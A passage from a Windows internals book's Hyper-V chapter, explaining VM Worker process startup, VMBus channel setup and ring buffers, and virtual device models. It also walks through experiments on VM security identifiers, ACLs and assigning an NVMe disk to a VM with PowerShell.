identify VMs (more information on system security components are available
in Part 1, Chapter 7, “Security”). The Host Compute Service waits for the
VMWP process to complete its initialization (in this way the exposed COM
interfaces become ready). The execution returns to the VMMS service, which
can finally request the starting of the VM to the VMWP process (through the
exposed IVirtualMachine COM interface).
As shown in Figure 9-24, the VM Worker process performs a “cold start”
state transition for the VM. In the VM Worker process, the entire VM is
managed through services exposed by the “Virtual Motherboard.” The
Virtual Motherboard emulates an Intel i440BX motherboard on Generation 1
VMs, whereas on Generation 2, it emulates a proprietary motherboard. It
manages and maintains the list of virtual devices and performs the state
transitions for each of them. As covered in the next section, each virtual
device is implemented as a COM object (exposing the IVirtualDevice
interface) in a DLL. The Virtual Motherboard enumerates each virtual device
from the VM’s configuration and loads the relative COM object representing
the device.
Figure 9-24 The VM Worker process and its interface for performing a
“cold start” of a VM.
The VM Worker process begins the startup procedure by reserving the
resources needed by each virtual device. It then constructs the VM guest
physical address space (virtual RAM) by allocating physical memory from
the root partition through the VID driver. At this stage, it can power up the
virtual motherboard, which will cycle between each VDEV and power it up.
The power-up procedure is different for each device: for example, synthetic
devices usually communicate with their own Virtualization Service Provider
(VSP) for the initial setup.
One virtual device that deserves a deeper discussion is the virtual BIOS
(implemented in the Vmchipset.dll library). Its power-up method allows the
VM to include the initial firmware executed when the bootstrap VP is started.
The BIOS VDEV extracts the correct firmware for the VM (legacy BIOS in
the case of Generation 1 VMs; UEFI otherwise) from the resource section of
its own backing library, builds the volatile configuration part of the firmware
(like the ACPI and the SRAT table), and injects it in the proper guest
physical memory by using services provided by the VID driver. The VID
driver is indeed able to map memory ranges described by the VID memory
block in user mode memory, accessible by the VM Worker process (this
procedure is internally called “memory aperture creation”).
After all the virtual devices have been successfully powered up, the VM
Worker process can start the bootstrap virtual processor of the VM by
sending a proper IOCTL to the VID driver, which will start the VP and its
message pump (used for exchanging messages between the VID driver and
the VM Worker process).
EXPERIMENT: Understanding the security of the VM
Worker process and the virtual hard disk files
In the previous section, we discussed how the VM Worker process
is launched by the Host Compute service (Vmcompute.exe) when a
request to start a VM is delivered to the VMMS process (through
WMI). Before communicating with the Host Compute Service, the
VMMS generates a security token for the new Worker process
instance.
Three new entities have been added to the Windows security
model to properly support virtual machines (the Windows Security
model has been extensively discussed in Chapter 7 of Part 1):
■ A “virtual machines” security group, identified with the S-
1-5-83-0 security identifier.
■ A virtual machine security identifier (SID), based on the
VM’s unique identifier (GUID). The VM SID becomes the
owner of the security token generated for the VM Worker
process.
■ A VM Worker process security capability used to give
applications running in AppContainers access to Hyper-V
services required by the VM Worker process.
In this experiment, you will create a new virtual machine
through the Hyper-V manager in a location that’s accessible only to
the current user and to the administrators group, and you will check
how the security of the VM files and the VM Worker process
change accordingly.
First, open an administrative command prompt and create a
folder in one of the workstation’s volumes (in the example we used
C:\TestVm), using the following command:
md c:\TestVm
Then you need to strip off all the inherited ACEs (Access control
entries; see Chapter 7 of Part 1 for further details) and add full
access ACEs for the administrators group and the current logged-
on user. The following commands perform the described actions
(you need to replace C:\TestVm with the path of your directory and
<UserName> with your currently logged-on user name):
Click here to view code image
icacls c:\TestVm /inheritance:r
icacls c:\TestVm /grant Administrators:(CI)(OI)F
icacls c:\TestVm /grant <UserName>:(CI)(OI)F
To verify that the folder has the correct ACL, you should open
File Explorer (by pressing Win+E on your keyboard), right-click
the folder, select Properties, and finally click the Security tab. You
should see a window like the following one:
Open the Hyper-V Manager, create a VM (and its relative virtual
disk), and store it in the newly created folder (procedure available
at the following page: https://docs.microsoft.com/en-
us/virtualization/hyper-v-on-windows/quick-start/create-virtual-
machine). For this experiment, you don’t really need to install an
OS on the VM. After the New Virtual Machine Wizard ends, you
should start your VM (in the example, the VM is VM1).
Open a Process Explorer as administrator and locate the
vmwp.exe process. Right-click it and select Properties. As
expected, you can see that the parent process is vmcompute.exe
(Host Compute Service). If you click the Security tab, you should
see that the VM SID is set as the owner of the process, and the
token belongs to the Virtual Machines group:
The SID is composed by reflecting the VM GUID. In the
example, the VM’s GUID is {F156B42C-4AE6-4291-8AD6-
EDFE0960A1CE}. (You can verify it also by using PowerShell, as
explained in the “Playing with the Root scheduler” experiment
earlier in this chapter). A GUID is a sequence of 16-bytes,
organized as one 32-bit (4 bytes) integer, two 16-bit (2 bytes)
integers, and 8 final bytes. The GUID in the example is organized
as:
■ 0xF156B42C as the first 32-bit integer, which, in decimal,
is 4048991276.
■ 0x4AE6 and 0x4291 as the two 16-bit integers, which,
combined as one 32-bit value, is 0x42914AE6, or
1116818150 in decimal (remember that the system is little
endian, so the less significant byte is located at the lower
address).
■ The final byte sequence is 0x8A, 0xD6, 0xED, 0xFE, 0x09,
0x60, 0xA1 and 0xCE (the third part of the shown human
readable GUID, 8AD6, is a byte sequence, and not a 16-bit
value), which, combined as two 32-bit values is
0xFEEDD68A and 0xCEA16009, or 4276999818 and
3466682377 in decimal.
If you combine all the calculated decimal numbers with a
general SID identifier emitted by the NT authority (S-1-5) and the
VM base RID (83), you should obtain the same SID shown in
Process Explorer (in the example, S-1-5-83-4048991276-
1116818150-4276999818-3466682377).
As you can see from Process Explorer, the VMWP process’s
security token does not include the Administrators group, and it
hasn’t been created on behalf of the logged-on user. So how is it
possible that the VM Worker process can access the virtual hard
disk and the VM configuration files?
The answer resides in the VMMS process, which, at VM
creation time, scans each component of the VM’s path and
modifies the DACL of the needed folders and files. In particular,
the root folder of the VM (the root folder has the same name of the
VM, so you should find a subfolder in the created directory with
the same name of your VM) is accessible thanks to the added
virtual machines security group ACE. The virtual hard disk file is
instead accessible thanks to an access-allowed ACE targeting the
virtual machine’s SID.
You can verify this by using File Explorer: Open the VM’s
virtual hard disk folder (called Virtual Hard Disks and located in
the VM root folder), right-click the VHDX (or VHD) file, select
Properties, and then click the Security page. You should see two
new ACEs other than the one set initially. (One is the virtual
machine ACE; the other one is the VmWorker process Capability
for AppContainers.)
If you stop the VM and you try to delete the virtual machine
ACE from the file, you will see that the VM is not able to start
anymore. For restoring the correct ACL for the virtual hard disk,
you can run a PowerShell script available at
https://gallery.technet.microsoft.com/Hyper-V-Restore-ACL-
e64dee58.
VMBus
VMBus is the mechanism exposed by the Hyper-V virtualization stack to
provide interpartition communication between VMs. It is a virtual bus device
that sets up channels between the guest and the host. These channels provide
the capability to share data between partitions and set up paravirtualized (also
known as synthetic) devices.
The root partition hosts Virtualization Service Providers (VSPs) that
communicate over VMBus to handle device requests from child partitions.
On the other end, child partitions (or guests) use Virtualization Service
Consumers (VSCs) to redirect device requests to the VSP over VMBus.
Child partitions require VMBus and VSC drivers to use the paravirtualized
device stacks (more details on virtual hardware support are provided later in
this chapter in the ”Virtual hardware support” section). VMBus channels
allow VSCs and VSPs to transfer data primarily through two ring buffers:
upstream and downstream. These ring buffers are mapped into both partitions
thanks to the hypervisor, which, as discussed in the previous section, also
provides interpartition communication services through the SynIC.
One of the first virtual devices (VDEV) that the Worker process starts
while powering up a VM is the VMBus VDEV (implemented in
Vmbusvdev.dll). Its power-on routine connects the VM Worker process to
the VMBus root driver (Vmbusr.sys) by sending VMBUS_VDEV_SETUP
IOCTL to the VMBus root device (named \Device\RootVmBus). The
VMBus root driver orchestrates the parent endpoint of the bidirectional
communication to the child VM. Its initial setup routine, which is invoked at
the time the target VM isn’t still powered on, has the important role to create
an XPartition data structure, which is used to represent the VMBus instance
of the child VM and to connect the needed SynIC synthetic interrupt sources
(also known as SINT, see the “Synthetic Interrupt Controller” section earlier
in this chapter for more details). In the root partition, VMBus uses two
synthetic interrupt sources: one for the initial message handshaking (which
happens before the channel is created) and another one for the synthetic
events signaled by the ring buffers. Child partitions use only one SINT,
though. The setup routine allocates the main message port in the child VM
and the corresponding connection in the root, and, for each virtual processor
belonging to the VM, allocates an event port and its connection (used for
receiving synthetic events from the child VM).
The two synthetic interrupt sources are mapped using two ISR routines,
named KiVmbusInterrupt0 and KiVmbusInterrupt1. Thanks to these two
routines, the root partition is ready to receive synthetic interrupts and
messages from the child VM. When a message (or event) is received, the ISR
queues a deferred procedure call (DPC), which checks whether the message
is valid; if so, it queues a work item, which will be processed later by the
system running at passive IRQL level (which has further implications on the
message queue).
Once VMBus in the root partition is ready, each VSP driver in the root can
use the services exposed by the VMBus kernel mode client library to allocate
and offer a VMBus channel to the child VM. The VMBus kernel mode client
library (abbreviated as KMCL) represents a VMBus channel through an
opaque KMODE_CLIENT_CONTEXT data structure, which is allocated and
initialized at channel creation time (when a VSP calls the
VmbChannelAllocate API). The root VSP then normally offers the channel to
the child VM by calling the VmbChannelEnabled API (this function in the
child establishes the actual connection to the root by opening the channel).
KMCL is implemented in two drivers: one running in the root partition
(Vmbkmclr.sys) and one loaded in child partitions (Vmbkmcl.sys).
Offering a channel in the root is a relatively complex operation that
involves the following steps:
1.
The KMCL driver communicates with the VMBus root driver through
the file object initialized in the VDEV power-up routine. The VMBus
driver obtains the XPartition data structure representing the child
partition and starts the channel offering process.
2.
Lower-level services provided by the VMBus driver allocate and
initialize a LOCAL_OFFER data structure representing a single
“channel offer” and preallocate some SynIC predefined messages.
VMBus then creates the synthetic event port in the root, from which
the child can connect to signal events after writing data to the ring
buffer. The LOCAL_OFFER data structure representing the offered
channel is added to an internal server channels list.
3.
After VMBus has created the channel, it tries to send the
OfferChannel message to the child with the goal to inform it of the
new channel. However, at this stage, VMBus fails because the other
end (the child VM) is not ready yet and has not started the initial
message handshake.
After all the VSPs have completed the channel offering, and all the VDEV
have been powered up (see the previous section for details), the VM Worker
process starts the VM. For channels to be completely initialized, and their
relative connections to be started, the guest partition should load and start the
VMBus child driver (Vmbus.sys).
Initial VMBus message handshaking
In Windows, the VMBus child driver is a WDF bus driver enumerated and
started by the Pnp manager and located in the ACPI root enumerator.
(Another version of the VMBus child driver is also available for Linux.
VMBus for Linux is not covered in this book, though.) When the NT kernel
starts in the child VM, the VMBus driver begins its execution by initializing
its own internal state (which means allocating the needed data structure and
work items) and by creating the \Device\VmBus root functional device object
(FDO). The Pnp manager then calls the VMBus’s resource assignment
handler routine. The latter configures the correct SINT source (by emitting a
HvSetVpRegisters hypercall on one of the HvRegisterSint registers, with the
help of the WinHv driver) and connects it to the KiVmbusInterrupt2 ISR.
Furthermore, it obtains the SIMP page, used for sending and receiving
synthetic messages to and from the root partition (see the “Synthetic Interrupt
Controller” section earlier in this chapter for more details), and creates the
XPartition data structure representing the parent (root) partition.
When the request of starting the VMBus’ FDO comes from the Pnp
manager, the VMBus driver starts the initial message handshaking. At this
stage, each message is sent by emitting the HvPostMessage hypercall (with
the help of the WinHv driver), which allows the hypervisor to inject a
synthetic interrupt to a target partition (in this case, the target is the partition).
The receiver acquires the message by simply reading from the SIMP page;
the receiver signals that the message has been read from the queue by setting
the new message type to MessageTypeNone. (See the hypervisor TLFS for
more details.) The reader can think of the initial message handshake, which is
represented in Figure 9-25, as a process divided in two phases.
Figure 9-25 VMBus initial message handshake.
The first phase is represented by the Initiate Contact message, which is
delivered once in the lifetime of the VM. This message is sent from the child
VM to the root with the goal to negotiate the VMBus protocol version
supported by both sides. At the time of this writing, there are five main
VMBus protocol versions, with some additional slight variations. The root
partition parses the message, asks the hypervisor to map the monitor pages
allocated by the client (if supported by the protocol), and replies by accepting
the proposed protocol version. Note that if this is not the case (which happens
when the Windows version running in the root partition is lower than the one
running in the child VM), the child VM restarts the process by downgrading
the VMBus protocol version until a compatible version is established. At this
point, the child is ready to send the Request Offers message, which causes the
root partition to send the list of all the channels already offered by the VSPs.
This allows the child partition to open the channels later in the handshaking
protocol.
Figure 9-25 highlights the different synthetic messages delivered through
the hypervisor for setting up the VMBus channel or channels. The root
partition walks the list of the offered channels located in the Server Channels
list (LOCAL_OFFER data structure, as discussed previously), and, for each
of them, sends an Offer Channel message to the child VM. The message is
the same as the one sent at the final stage of the channel offering protocol,
which we discussed previously in the “VMBus” section. So, while the first
phase of the initial message handshake happens only once per lifetime of the
VM, the second phase can start any time when a channel is offered. The
Offer Channel message includes important data used to uniquely identify the
channel, like the channel type and instance GUIDs. For VDEV channels,
these two GUIDs are used by the Pnp Manager to properly identify the
associated virtual device.
The child responds to the message by allocating the client
LOCAL_OFFER data structure representing the channel and the relative
XInterrupt object, and by determining whether the channel requires a
physical device object (PDO) to be created, which is usually always true for
VDEVs’ channels. In this case, the VMBus driver creates an instance PDO
representing the new channel. The created device is protected through a
security descriptor that renders it accessible only from system and
administrative accounts. The VMBus standard device interface, which is
attached to the new PDO, maintains the association between the new VMBus
channel (through the LOCAL_OFFER data structure) and the device object.
After the PDO is created, the Pnp Manager is able to identify and load the
correct VSC driver through the VDEV type and instance GUIDs included in
the Offer Channel message. These interfaces become part of the new PDO
and are visible through the Device Manager. See the following experiment
for details. When the VSC driver is then loaded, it usually calls the
VmbEnableChannel API (exposed by KMCL, as discussed previously) to
“open” the channel and create the final ring buffer.
EXPERIMENT: Listing virtual devices (VDEVs)
exposed through VMBus
Each VMBus channel is identified through a type and instance
GUID. For channels belonging to VDEVs, the type and instance
GUID also identifies the exposed device. When the VMBus child
driver creates the instance PDOs, it includes the type and instance
GUID of the channel in multiple devices’ properties, like the
instance path, hardware ID, and compatible ID. This experiment
shows how to enumerate all the VDEVs built on the top of VMBus.
For this experiment, you should build and start a Windows 10
virtual machine through the Hyper-V Manager. When the virtual
machine is started and runs, open the Device Manager (by typing
its name in the Cortana search box, for example). In the Device
Manager applet, click the View menu, and select Device by
Connection. The VMBus bus driver is enumerated and started
through the ACPI enumerator, so you should expand the ACPI
x64-based PC root node and then the ACPI Module Device located
in the Microsoft ACPI-Compliant System child node, as shown in
the following figure:
By opening the ACPI Module Device, you should find another
node, called Microsoft Hyper-V Virtual Machine Bus, which
represents the root VMBus PDO. Under that node, the Device
Manager shows all the instance devices created by the VMBus
FDO after their relative VMBus channels have been offered from
the root partition.
Now right-click one of the Hyper-V devices, such as the
Microsoft Hyper-V Video device, and select Properties. For
showing the type and instance GUIDs of the VMBus channel
backing the virtual device, open the Details tab of the Properties
window. Three device properties include the channel’s type and
instance GUID (exposed in different formats): Device Instance
path, Hardware ID, and Compatible ID. Although the compatible
ID contains only the VMBus channel type GUID ({da0a7802-
e377-4aac-8e77-0558eb1073f8} in the figure), the hardware ID
and device instance path contain both the type and instance GUIDs.
Opening a VMBus channel and creating the ring
buffer
For correctly starting the interpartition communication and creating the ring
buffer, a channel must be opened. Usually VSCs, after having allocated the
client side of the channel (still through VmbChannel Allocate), call the
VmbChannelEnable API exported from the KMCL driver. As introduced in
the previous section, this API in the child partitions opens a VMBus channel,
which has already been offered by the root. The KMCL driver communicates
with the VMBus driver, obtains the channel parameters (like the channel’s
type, instance GUID, and used MMIO space), and creates a work item for the
received packets. It then allocates the ring buffer, which is shown in Figure 9-
26. The size of the ring buffer is usually specified by the VSC through a call
to the KMCL exported VmbClientChannelInitSetRingBufferPageCount API.
Figure 9-26 An example of a 16-page ring buffer allocated in the child
partition.
The ring buffer is allocated from the child VM’s non-paged pool and is
mapped through a memory descriptor list (MDL) using a technique called
double mapping. (MDLs are described in Chapter 5 of Part 1.) In this
technique, the allocated MDL describes a double number of the incoming (or
outgoing) buffer’s physical pages. The PFN array of the MDL is filled by
including the physical pages of the buffer twice: one time in the first half of
the array and one time in the second half. This creates a “ring buffer.”
For example, in Figure 9-26, the incoming and outgoing buffers are 16
pages (0x10) large. The outgoing buffer is mapped at address
0xFFFFCA803D8C0000. If the sender writes a 1-KB VMBus packet to a
position close to the end of the buffer, let’s say at offset 0x9FF00, the write
succeeds (no access violation exception is raised), but the data will be written
partially in the end of the buffer and partially in the beginning. In Figure 9-
26, only 256 (0x100) bytes are written at the end of the buffer, whereas the
remaining 768 (0x300) bytes are written in the start.
Both the incoming and outgoing buffers are surrounded by a control page.
The page is shared between the two endpoints and composes the VM ring
control block. This data structure is used to keep track of the position of the
last packet written in the ring buffer. It furthermore contains some bits to
control whether to send an interrupt when a packet needs to be delivered.
After the ring buffer has been created, the KMCL driver sends an IOCTL
to VMBus, requesting the creation of a GPA descriptor list (GPADL). A
GPADL is a data structure very similar to an MDL and is used for describing
a chunk of physical memory. Differently from an MDL, the GPADL contains
an array of guest physical addresses (GPAs, which are always expressed as
64-bit numbers, differently from the PFNs included in a MDL). The VMBus
driver sends different messages to the root partition for transferring the entire
GPADL describing both the incoming and outcoming ring buffers. (The
maximum size of a synthetic message is 240 bytes, as discussed earlier.) The
root partition reconstructs the entire GPADL and stores it in an internal list.
The GPADL is mapped in the root when the child VM sends the final Open
Channel message. The root VMBus driver parses the received GPADL and
maps it in its own physical address space by using services provided by the
VID driver (which maintains the list of memory block ranges that comprise
the VM physical address space).
At this stage the channel is ready: the child and the root partition can
communicate by simply reading or writing data to the ring buffer. When a
sender finishes writing its data, it calls the VmbChannelSend
SynchronousRequest API exposed by the KMCL driver. The API invokes
VMBus services to signal an event in the monitor page of the Xinterrupt
object associated with the channel (old versions of the VMBus protocol used
an interrupt page, which contained a bit corresponding to each channel),
Alternatively, VMBus can signal an event directly in the channel’s event
port, which depends only on the required latency.
Other than VSCs, other components use VMBus to implement higher-level
interfaces. Good examples are provided by the VMBus pipes, which are
implemented in two kernel mode libraries (Vmbuspipe.dll and
Vmbuspiper.dll) and rely on services exposed by the VMBus driver (through
IOCTLs). Hyper-V Sockets (also known as HvSockets) allow high-speed
interpartition communication using standard network interfaces (sockets). A
client connects an AF_HYPERV socket type to a target VM by specifying the
target VM’s GUID and a GUID of the Hyper-V socket’s service registration
(to use HvSockets, both endpoints must be registered in the
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\
Virtualization\GuestCommunicationServices registry key) instead of the
target IP address and port. Hyper-V Sockets are implemented in multiple
drivers: HvSocket.sys is the transport driver, which exposes low-level
services used by the socket infrastructure; HvSocketControl.sys is the
provider control driver used to load the HvSocket provider in case the
VMBus interface is not present in the system; HvSocket.dll is a library that
exposes supplementary socket interfaces (tied to Hyper-V sockets) callable
from user mode applications. Describing the internal infrastructure of both
Hyper-V Sockets and VMBus pipes is outside the scope of this book, but
both are documented in Microsoft Docs.
Virtual hardware support
For properly run virtual machines, the virtualization stack needs to support
virtualized devices. Hyper-V supports different kinds of virtual devices,
which are implemented in multiple components of the virtualization stack.
I/O to and from virtual devices is orchestrated mainly in the root OS. I/O
includes storage, networking, keyboard, mouse, serial ports and GPU
(graphics processing unit). The virtualization stack exposes three kinds of
devices to the guest VMs:
■ Emulated devices, also known—in industry-standard form—as fully
virtualized devices
■ Synthetic devices, also known as paravirtualized devices
■ Hardware-accelerated devices, also known as direct-access devices
For performing I/O to physical devices, the processor usually reads and
writes data from input and output ports (I/O ports), which belong to a device.
The CPU can access I/O ports in two ways:
■ Through a separate I/O address space, which is distinct from the
physical memory address space and, on AMD64 platforms, consists
of 64 thousand individually addressable I/O ports. This method is old
and generally used for legacy devices.
■ Through memory mapped I/O. Devices that respond like memory
components can be accessed through the processor’s physical
memory address space. This means that the CPU accesses memory
through standard instructions: the underlying physical memory is
mapped to a device.
Figure 9-27 shows an example of an emulated device (the virtual IDE
controller used in Generation 1 VMs), which uses memory-mapped I/O for
transferring data to and from the virtual processor.
Figure 9-27 The virtual IDE controller, which uses emulated I/O to
perform data transfer.
In this model, every time the virtual processor reads or writes to the device
MMIO space or emits instructions to access the I/O ports, it causes a
VMEXIT to the hypervisor. The hypervisor calls the proper intercept routine,
which is dispatched to the VID driver. The VID driver builds a VID message
and enqueues it in an internal queue. The queue is drained by an internal
VMWP’s thread, which waits and dispatches the VP’s messages received
from the VID driver; this thread is called the message pump thread and
belongs to an internal thread pool initialized at VMWP creation time. The
VM Worker process identifies the physical address causing the VMEXIT,
which is associated with the proper virtual device (VDEV), and calls into one
of the VDEV callbacks (usually read or write callback). The VDEV code
uses the services provided by the instruction emulator to execute the faulting
instruction and properly emulate the virtual device (an IDE controller in the
example).
Note
The full instructions emulator located in the VM Worker process is also
used for other different purposes, such as to speed up cases of intercept-
intensive code in a child partition. The emulator in this case allows the
execution context to stay in the Worker process between intercepts, as
VMEXITs have serious performance overhead. Older versions of the
hardware virtualization extensions prohibit executing real-mode code in a
virtual machine; for those cases, the virtualization stack was using the
emulator for executing real-mode code in a VM.
Paravirtualized devices
While emulated devices always produce VMEXITs and are quite slow,
Figure 9-28 shows an example of a synthetic or paravirtualized device: the
synthetic storage adapter. Synthetic devices know to run in a virtualized
environment; this reduces the complexity of the virtual device and allows it
to achieve higher performance. Some synthetic virtual devices exist only in
virtual form and don’t emulate any real physical hardware (an example is
synthetic RDP).
Figure 9-28 The storage controller paravirtualized device.
Paravirtualized devices generally require three main components:
■ A virtualization service provider (VSP) driver runs in the root
partition and exposes virtualization-specific interfaces to the guest
thanks to the services provided by VMBus (see the previous section
for details on VMBus).
■ A synthetic VDEV is mapped in the VM Worker process and usually
cooperates only in the start-up, teardown, save, and restore of the
virtual device. It is generally not used during the regular work of the
device. The synthetic VDEV initializes and allocates device-specific
resources (in the example, the SynthStor VDEV initializes the virtual
storage adapter), but most importantly allows the VSP to offer a
VMBus communication channel to the guest VSC. The channel will
be used for communication with the root and for signaling device-
specific notifications via the hypervisor.
■ A virtualization service consumer (VSC) driver runs in the child
partition, understands the virtualization-specific interfaces exposed by
the VSP, and reads/writes messages and notifications from the shared
memory exposed through VMBus by the VSP. This allows the virtual
device to run in the child VM faster than an emulated device.
Hardware-accelerated devices
On server SKUs, hardware-accelerated devices (also known as direct-access
devices) allow physical devices to be remapped in the guest partition, thanks
to the services exposed by the VPCI infrastructure. When a physical device
supports technologies like single-root input/output virtualization (SR IOV) or
Discrete Device Assignment (DDA), it can be mapped to a guest partition.
The guest partition can directly access the MMIO space associated with the
device and can perform DMA to and from the guest memory directly without
any interception by the hypervisor. The IOMMU provides the needed
security and ensures that the device can initiate DMA transfers only in the
physical memory that belong to the virtual machine.
Figure 9-29 shows the components responsible in managing the hardware-
accelerated devices:
■ The VPci VDEV (Vpcievdev.dll) runs in the VM Worker process. Its
rule is to extract the list of hardware-accelerated devices from the VM
configuration file, set up the VPCI virtual bus, and assign a device to
the VSP.
■ The PCI Proxy driver (Pcip.sys) is responsible for dismounting and
mounting a DDA-compatible physical device from the root partition.
Furthermore, it has the key role in obtaining the list of resources used
by the device (through the SR-IOV protocol) like the MMIO space
and interrupts. The proxy driver provides access to the physical
configuration space of the device and renders an “unmounted” device
inaccessible to the host OS.
■ The VPCI virtual service provider (Vpcivsp.sys) creates and
maintains the virtual bus object, which is associated to one or more
hardware-accelerated devices (which in the VPCI VSP are called
virtual devices). The virtual devices are exposed to the guest VM
through a VMBus channel created by the VSP and offered to the VSC
in the guest partition.
■ The VPCI virtual service client (Vpci.sys) is a WDF bus driver that
runs in the guest VM. It connects to the VMBus channel exposed by
the VSP, receives the list of the direct access devices exposed to the
VM and their resources, and creates a PDO (physical device object)
for each of them. The devices driver can then attach to the created
PDOs in the same way as they do in nonvirtualized environments.
Figure 9-29 Hardware-accelerated devices.
When a user wants to map a hardware-accelerated device to a VM, it uses
some PowerShell commands (see the following experiment for further
details), which start by “unmounting” the device from the root partition. This
action forces the VMMS service to communicate with the standard PCI
driver (through its exposed device, called PciControl). The VMMS service
sends a PCIDRIVE_ADD_VMPROXYPATH IOCTL to the PCI driver by
providing the device descriptor (in form of bus, device, and function ID). The
PCI driver checks the descriptor, and, if the verification succeeded, adds it in
the HKLM\System\CurrentControlSet\Control\PnP\Pci\VmProxy registry
value. The VMMS then starts a PNP device (re)enumeration by using
services exposed by the PNP manager. In the enumeration phase, the PCI
driver finds the new proxy device and loads the PCI proxy driver (Pcip.sys),
which marks the device as reserved for the virtualization stack and renders it
invisible to the host operating system.
The second step requires assigning the device to a VM. In this case, the
VMMS writes the device descriptor in the VM configuration file. When the
VM is started, the VPCI VDEV (vpcievdev.dll) reads the direct-access
device’s descriptor from the VM configuration, and starts a complex
configuration phase that is orchestrated mainly by the VPCI VSP
(Vpcivsp.sys). Indeed, in its “power on” callback, the VPCI VDEV sends
different IOCTLs to the VPCI VSP (which runs in the root partition), with
the goal to perform the creation of the virtual bus and the assignment of
hardware-accelerated devices to the guest VM.
A “virtual bus” is a data structure used by the VPCI infrastructure as a
“glue” to maintain the connection between the root partition, the guest VM,
and the direct-access devices assigned to it. The VPCI VSP allocates and
starts the VMBus channel offered to the guest VM and encapsulates it in the
virtual bus. Furthermore, the virtual bus includes some pointers to important
data structures, like some allocated VMBus packets used for the bidirectional
communication, the guest power state, and so on. After the virtual bus is
created, the VPCI VSP performs the device assignment.
A hardware-accelerated device is internally identified by a LUID and is
represented by a virtual device object, which is allocated by the VPCI VSP.
Based on the device’s LUID, the VPCI VSP locates the proper proxy driver,
which is also known as Mux driver—it’s usually Pcip.sys). The VPCI VSP
queries the SR-IOV or DDA interfaces from the proxy driver and uses them
to obtain the Plug and Play information (hardware descriptor) of the direct-
access device and to collect the resource requirements (MMIO space, BAR
registers, and DMA channels). At this point, the device is ready to be
attached to the guest VM: the VPCI VSP uses the services exposed by the
WinHvr driver to emit the HvAttachDevice hypercall to the hypervisor,
which reconfigures the system IOMMU for mapping the device’s address
space in the guest partition.
The guest VM is aware of the mapped device thanks to the VPCI VSC
(Vpci.sys). The VPCI VSC is a WDF bus driver enumerated and launched by
the VMBus bus driver located in the guest VM. It is composed of two main
components: a FDO (functional device object) created at VM boot time, and
one or more PDOs (physical device objects) representing the physical direct-
access devices remapped in the guest VM. When the VPCI VSC bus driver is
executed in the guest VM, it creates and starts the client part of the VMBus
channel used to exchange messages with the VSP. “Send bus relations” is the
first message sent by the VPCI VSC thorough the VMBus channel. The VSP
in the root partition responds by sending the list of hardware IDs describing
the hardware-accelerated devices currently attached to the VM. When the
PNP manager requires the new device relations to the VPCI VSC, the latter
creates a new PDO for each discovered direct-access device. The VSC driver
sends another message to the VSP with the goal of requesting the resources
used by the PDO.
After the initial setup is done, the VSC and VSP are rarely involved in the
device management. The specific hardware-accelerated device’s driver in the
guest VM attaches to the relative PDO and manages the peripheral as if it had
been installed on a physical machine.
EXPERIMENT: Mapping a hardware-accelerated
NVMe disk to a VM
As explained in the previous section, physical devices that support
SR-IOV and DDE technologies can be directly mapped in a guest
VM running in a Windows Server 2019 host. In this experiment,
we are mapping an NVMe disk, which is connected to the system
through the PCI-Ex bus and supports DDE, to a Windows 10 VM.
(Windows Server 2019 also supports the direct assignment of a
graphics card, but this is outside the scope of this experiment.)
As explained at https://docs.microsoft.com/en-
us/virtualization/community/team-blog/2015/20151120-discrete-
device-assignment-machines-and-devices, for being able to be
reassigned, a device should have certain characteristics, such as
supporting message-signaled interrupts and memory-mapped I/O.
Furthermore, the machine in which the hypervisor runs should
support SR-IOV and have a proper I/O MMU. For this experiment,
you should start by verifying that the SR-IOV standard is enabled
in the system BIOS (not explained here; the procedure varies based
on the manufacturer of your machine).
The next step is to download a PowerShell script that verifies
whether your NVMe controller is compatible with Discrete Device
Assignment. You should download the survey-dda.ps1 PowerShell
script from https://github.com/MicrosoftDocs/Virtualization-
Documentation/tree/master/hyperv-samples/benarm-
powershell/DDA. Open an administrative PowerShell window (by
typing PowerShell in the Cortana search box and selecting Run As
Administrator) and check whether the PowerShell script
execution policy is set to unrestricted by running the Get-
ExecutionPolicy command. If the command yields some output
different than Unrestricted, you should type the following: Set-
ExecutionPolicy -Scope LocalMachine -ExecutionPolicy
Unrestricted, press Enter, and confirm with Y.
If you execute the downloaded survey-dda.ps1 script, its output
should highlight whether your NVMe device can be reassigned to
the guest VM. Here is a valid output example:
Click here to view code image
Standard NVM Express Controller
Express Endpoint -- more secure.
And its interrupts are message-based, assignment can
work.
PCIROOT(0)#PCI(0302)#PCI(0000)
Take note of the location path (the
PCIROOT(0)#PCI(0302)#PCI(0000) string in the example). Now
we will set the automatic stop action for the target VM as turned-
off (a required step for DDA) and dismount the device. In our
example, the VM is called “Vibranium.” Write the following
commands in your PowerShell window (by replacing the sample
VM name and device location with your own):
Click here to view code image
Set-VM -Name "Vibranium" -AutomaticStopAction TurnOff
Dismount-VMHostAssignableDevice -LocationPath
"PCIROOT(0)#PCI(0302)#PCI(0000)"
In case the last command yields an operation failed error, it is
likely that you haven’t disabled the device. Open the Device
Manager, locate your NVMe controller (Standard NVMe Express
Controller in this example), right-click it, and select Disable
Device. Then you can type the last command again. It should
succeed this time. Then assign the device to your VM by typing the
following:
Click here to view code image
Add-VMAssignableDevice -LocationPath
"PCIROOT(0)#PCI(0302)#PCI(0000)" -VMName "Vibranium"
The last command should have completely removed the NVMe
controller from the host. You should verify this by checking the
Device Manager in the host system. Now it’s time to power up the
VM. You can use the Hyper-V Manager tool or PowerShell. If you
start the VM and get an error like the following, your BIOS is not
properly configured to expose SR-IOV, or your I/O MMU doesn’t
have the required characteristics (most likely it does not support
I/O remapping).
Otherwise, the VM should simply boot as expected. In this case,
you should be able to see both the NVMe controller and the NVMe
disk listed in the Device Manager applet of the child VM. You can
use the disk management tool to create partitions in the child VM
in the same way you do in the host OS. The NVMe disk will run at
full speed with no performance penalties (you can confirm this by
using any disk benchmark tool).
To properly remove the device from the VM and remount it in
the host OS, you should first shut down the VM and then use the
following commands (remember to always change the virtual
machine name and NVMe controller location):
Click here to view code image
Remove-VMAssignableDevice -LocationPath
"PCIROOT(0)#PCI(0302)#PCI(0000)" -VMName
"Vibranium"
Mount-VMHostAssignableDevice -LocationPath
"PCIROOT(0)#PCI(0302)#PCI(0000)"
After the last command, the NVMe controller should reappear
listed in the Device Manager of the host OS. You just need to
reenable it for restarting to use the NVMe disk in the host.
VA-backed virtual machines
Virtual machines are being used for multiple purposes. One of them is to
properly run traditional software in isolated environments, called containers.
(Server and application silos, which are two types of containers, have been
introduced in Part 1, Chapter 3, “Processes and jobs.”) Fully isolated
containers (internally named Xenon and Krypton) require a fast-startup type,
low overhead, and the possibility of getting the lowest possible memory
